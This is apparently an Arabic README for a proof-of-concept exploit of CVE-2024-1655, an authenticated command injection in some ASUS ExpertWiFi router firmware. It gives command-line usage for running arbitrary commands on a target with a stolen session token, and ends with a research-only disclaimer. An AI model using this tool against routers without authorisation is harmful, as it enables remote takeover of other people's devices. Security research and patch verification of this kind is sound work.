
البرامج الثابتة الخاصة بـ ASUS ExpertWiFi EBM63 وEBM68 وRT-AX57 Go قبل تصحيح 12-04-2024 تحتوي على ثغرة حقن أوامر في دالة splash_page_SDN.cgi. عندما يرسل المهاجم طلبًا مصممًا خصيصًا، يمكنه تحقيق تنفيذ تعسفي للكود.
المراجع:
الثغرة عبارة عن RCE موثّق (يتطلب مصادقة)، ويُطلب من مستخدمي هذا السكربت أولاً استرداد رمز تسجيل الدخول (قيمة asus_token من ترويسة الكوكي) للهدف.
$ python3 CVE-2024-1655.py --host <TARGET_HOST> --token <ASUS_TOKEN> <COMMAND>
مثال: إنشاء ملف في مجلد tmp
$ python3 CVE-2024-1655.py --host http://192.168.1.1:8080 --token pEnRts37WwOZT1qwwJjhRWFhfBLBmNQ "echo pwned > /tmp/pwn.txt"
أنشأ المؤلف هذا البرنامج لأغراض البحث الأكاديمي ومساعدة الآخرين في فهم المخاطر الأمنية المرتبطة به فقط. بالإضافة إلى ذلك، ليس الغرض من هذا البرنامج استخدامه لمهاجمة الأنظمة إلا في الحالات المصرح بها صراحةً. لا يتحمل القائمون على المشروع المسؤولية أو التبعية عن إساءة استخدام البرنامج. يُنصح بالاستخدام المسؤول.